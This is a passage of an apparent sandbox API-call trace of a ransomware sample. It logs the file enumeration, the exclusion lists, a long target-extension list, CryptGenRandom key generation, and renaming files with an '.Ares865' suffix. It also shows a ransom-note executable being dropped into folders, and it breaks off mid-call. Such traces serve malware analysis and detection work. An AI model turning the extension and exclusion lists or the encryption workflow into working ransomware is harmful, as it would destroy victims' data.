0x3030020 [0081.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0081.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0081.940] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0081.940] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0081.940] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0081.941] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a0, lpName=0x0) returned 0x15c [0081.942] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a0) returned 0x190000 [0081.991] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0081.992] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0081.992] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0081.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0081.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0081.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x320fc8 [0081.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2d7700 [0081.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0081.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2d7818 [0081.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9fb0 [0081.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7818 | out: hHeap=0x2b0000) returned 1 [0081.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9fb0 | out: hHeap=0x2b0000) returned 1 [0081.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0081.992] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0081.992] CloseHandle (hObject=0x15c) returned 1 [0081.992] CloseHandle (hObject=0x118) returned 1 [0081.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0081.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0081.992] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0081.993] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="aoldtz.exe") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="..") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="windows") returned -1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="bootmgr") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="temp") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="pagefile.sys") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="boot") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="ids.txt") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="ntuser.dat") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="perflogs") returned 1 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="MSBuild") returned 1 [0081.993] lstrlenW (lpString="vcredist_x64.exe") returned 16 [0081.993] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 81 [0081.993] lstrcpyW (in: lpString1=0x2cce490, lpString2="vcredist_x64.exe" | out: lpString1="vcredist_x64.exe") returned="vcredist_x64.exe" [0081.993] lstrlenW (lpString="vcredist_x64.exe") returned 16 [0081.993] lstrlenW (lpString="Ares865") returned 7 [0081.993] lstrcmpiW (lpString1="x64.exe", lpString2="Ares865") returned 1 [0081.993] lstrlenW (lpString=".dll") returned 4 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".dll") returned 1 [0081.993] lstrlenW (lpString=".lnk") returned 4 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".lnk") returned 1 [0081.993] lstrlenW (lpString=".ini") returned 4 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".ini") returned 1 [0081.993] lstrlenW (lpString=".sys") returned 4 [0081.993] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".sys") returned 1 [0081.994] lstrlenW (lpString="vcredist_x64.exe") returned 16 [0081.994] lstrlenW (lpString="bak") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="bak") returned 1 [0081.994] lstrlenW (lpString="ba_") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="ba_") returned 1 [0081.994] lstrlenW (lpString="dbb") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="dbb") returned 1 [0081.994] lstrlenW (lpString="vmdk") returned 4 [0081.994] lstrcmpiW (lpString1=".exe", lpString2="vmdk") returned -1 [0081.994] lstrlenW (lpString="rar") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="rar") returned -1 [0081.994] lstrlenW (lpString="zip") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="zip") returned -1 [0081.994] lstrlenW (lpString="tgz") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="tgz") returned -1 [0081.994] lstrlenW (lpString="vbox") returned 4 [0081.994] lstrcmpiW (lpString1=".exe", lpString2="vbox") returned -1 [0081.994] lstrlenW (lpString="vdi") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="vdi") returned -1 [0081.994] lstrlenW (lpString="vhd") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="vhd") returned -1 [0081.994] lstrlenW (lpString="vhdx") returned 4 [0081.994] lstrcmpiW (lpString1=".exe", lpString2="vhdx") returned -1 [0081.994] lstrlenW (lpString="avhd") returned 4 [0081.994] lstrcmpiW (lpString1=".exe", lpString2="avhd") returned -1 [0081.994] lstrlenW (lpString="db") returned 2 [0081.994] lstrcmpiW (lpString1="xe", lpString2="db") returned 1 [0081.994] lstrlenW (lpString="db2") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="db2") returned 1 [0081.994] lstrlenW (lpString="db3") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="db3") returned 1 [0081.994] lstrlenW (lpString="dbf") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="dbf") returned 1 [0081.994] lstrlenW (lpString="mdf") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="mdf") returned -1 [0081.994] lstrlenW (lpString="mdb") returned 3 [0081.994] lstrcmpiW (lpString1="exe", lpString2="mdb") returned -1 [0081.994] lstrlenW (lpString="sql") returned 3 [0081.995] lstrcmpiW (lpString1="exe", lpString2="sql") returned -1 [0081.995] lstrlenW (lpString="sqlite") returned 6 [0081.995] lstrcmpiW (lpString1="64.exe", lpString2="sqlite") returned -1 [0081.995] lstrlenW (lpString="sqlite3") returned 7 [0081.995] lstrcmpiW (lpString1="x64.exe", lpString2="sqlite3") returned 1 [0081.995] lstrlenW (lpString="sqlitedb") returned 8 [0081.995] lstrcmpiW (lpString1="_x64.exe", lpString2="sqlitedb") returned -1 [0081.995] lstrlenW (lpString="xml") returned 3 [0081.995] lstrcmpiW (lpString1="exe", lpString2="xml") returned -1 [0081.995] lstrlenW (lpString="$er") returned 3 [0081.995] lstrcmpiW (lpString1="exe", lpString2="$er") returned 1 [0081.995] lstrlenW (lpString="4dd") returned 3 [0081.995] lstrcmpiW (lpString1="exe", lpString2="4dd") returned 1 [0081.995] lstrlenW (lpString="4dl") returned 3 [0081.995] lstrcmpiW (lpString1="exe", lpString2="4dl") returned 1 [0081.995] lstrlenW (lpString="^^^") returned 3 [0081.995] lstrcmpiW (lpString1="exe", lpString2="^^^") returned 1 [0081.995] lstrlenW (lpString="abs") returned 3 [0081.995] lstrcmpiW (lpString1="exe", lpString2="abs") returned 1 [0081.995] lstrlenW (lpString="abx") returned 3 [0081.995] lstrcmpiW (lpString1="exe", lpString2="abx") returned 1 [0081.995] lstrlenW (lpString="accdb") returned 5 [0081.995] lstrcmpiW (lpString1="4.exe", lpString2="accdb") returned -1 [0081.995] lstrlenW (lpString="accdc") returned 5 [0081.995] lstrcmpiW (lpString1="4.exe", lpString2="accdc") returned -1 [0081.995] lstrlenW (lpString="accde") returned 5 [0081.995] lstrcmpiW (lpString1="4.exe", lpString2="accde") returned -1 [0081.995] lstrlenW (lpString="accdr") returned 5 [0081.995] lstrcmpiW (lpString1="4.exe", lpString2="accdr") returned -1 [0081.995] lstrlenW (lpString="accdt") returned 5 [0081.995] lstrcmpiW (lpString1="4.exe", lpString2="accdt") returned -1 [0081.995] lstrlenW (lpString="accdw") returned 5 [0081.995] lstrcmpiW (lpString1="4.exe", lpString2="accdw") returned -1 [0081.995] lstrlenW (lpString="accft") returned 5 [0081.995] lstrcmpiW (lpString1="4.exe", lpString2="accft") returned -1 [0081.995] lstrlenW (lpString="adb") returned 3 [0081.995] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0081.995] lstrlenW (lpString="adb") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0081.996] lstrlenW (lpString="ade") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="ade") returned 1 [0081.996] lstrlenW (lpString="adf") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="adf") returned 1 [0081.996] lstrlenW (lpString="adn") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="adn") returned 1 [0081.996] lstrlenW (lpString="adp") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="adp") returned 1 [0081.996] lstrlenW (lpString="alf") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="alf") returned 1 [0081.996] lstrlenW (lpString="ask") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="ask") returned 1 [0081.996] lstrlenW (lpString="btr") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="btr") returned 1 [0081.996] lstrlenW (lpString="cat") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="cat") returned 1 [0081.996] lstrlenW (lpString="cdb") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="cdb") returned 1 [0081.996] lstrlenW (lpString="ckp") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="ckp") returned 1 [0081.996] lstrlenW (lpString="cma") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="cma") returned 1 [0081.996] lstrlenW (lpString="cpd") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="cpd") returned 1 [0081.996] lstrlenW (lpString="dacpac") returned 6 [0081.996] lstrcmpiW (lpString1="64.exe", lpString2="dacpac") returned -1 [0081.996] lstrlenW (lpString="dad") returned 3 [0081.996] lstrcmpiW (lpString1="exe", lpString2="dad") returned 1 [0081.996] lstrlenW (lpString="dadiagrams") returned 10 [0081.996] lstrcmpiW (lpString1="st_x64.exe", lpString2="dadiagrams") returned 1 [0081.996] lstrlenW (lpString="daschema") returned 8 [0081.996] lstrcmpiW (lpString1="_x64.exe", lpString2="daschema") returned -1 [0081.996] lstrlenW (lpString="db-journal") returned 10 [0081.996] lstrcmpiW (lpString1="st_x64.exe", lpString2="db-journal") returned 1 [0081.996] lstrlenW (lpString="db-shm") returned 6 [0081.996] lstrcmpiW (lpString1="64.exe", lpString2="db-shm") returned -1 [0081.997] lstrlenW (lpString="db-wal") returned 6 [0081.997] lstrcmpiW (lpString1="64.exe", lpString2="db-wal") returned -1 [0081.997] lstrlenW (lpString="dbc") returned 3 [0081.997] lstrcmpiW (lpString1="exe", lpString2="dbc") returned 1 [0081.997] lstrlenW (lpString="dbs") returned 3 [0081.997] lstrcmpiW (lpString1="exe", lpString2="dbs") returned 1 [0081.997] lstrlenW (lpString="dbt") returned 3 [0081.997] lstrcmpiW (lpString1="exe", lpString2="dbt") returned 1 [0081.997] lstrlenW (lpString="dbv") returned 3 [0081.997] lstrcmpiW (lpString1="exe", lpString2="dbv") returned 1 [0081.997] lstrlenW (lpString="dbx") returned 3 [0081.997] lstrcmpiW (lpString1="exe", lpString2="dbx") returned 1 [0081.997] lstrlenW (lpString="dcb") returned 3 [0081.997] lstrcmpiW (lpString1="exe", lpString2="dcb") returned 1 [0081.997] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.Ares865") returned 96 [0081.997] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.ares865"), dwFlags=0x1) returned 1 [0081.998] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0081.999] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463016) returned 1 [0081.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0081.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0081.999] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0081.999] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0082.000] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0082.000] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.000] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x713b0, lpName=0x0) returned 0x15c [0082.001] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x713b0) returned 0x420000 [0082.364] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0082.365] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0082.365] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0082.365] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0082.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0082.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0082.365] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0082.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0082.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0082.365] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0082.365] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0082.365] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0082.365] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0082.369] CloseHandle (hObject=0x15c) returned 1 [0082.369] CloseHandle (hObject=0x118) returned 1 [0082.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0082.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0082.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0082.372] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a0db1a0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1073de80, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x710a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0082.372] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0082.372] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0082.372] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0082.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0082.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0082.372] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned 82 [0082.372] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0082.372] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0082.372] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0082.373] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0082.373] GetLastError () returned 0x0 [0082.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0082.374] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0082.374] CloseHandle (hObject=0x120) returned 1 [0082.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0082.374] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0082.374] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0082.374] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.374] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0082.374] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.374] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.374] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.374] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0082.374] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.374] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.374] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2576a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0082.374] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0082.374] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0082.374] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0082.374] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0082.374] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0082.374] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0082.374] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0082.374] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0082.374] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0082.374] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0082.374] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0082.375] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0082.375] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0082.375] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0082.375] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0082.375] lstrlenW (lpString="packages") returned 8 [0082.375] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*") returned 84 [0082.375] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="packages" | out: lpString1="packages") returned="packages" [0082.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0082.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x2f2fc8 [0082.375] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0082.375] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0082.375] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0082.375] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0082.375] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0082.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 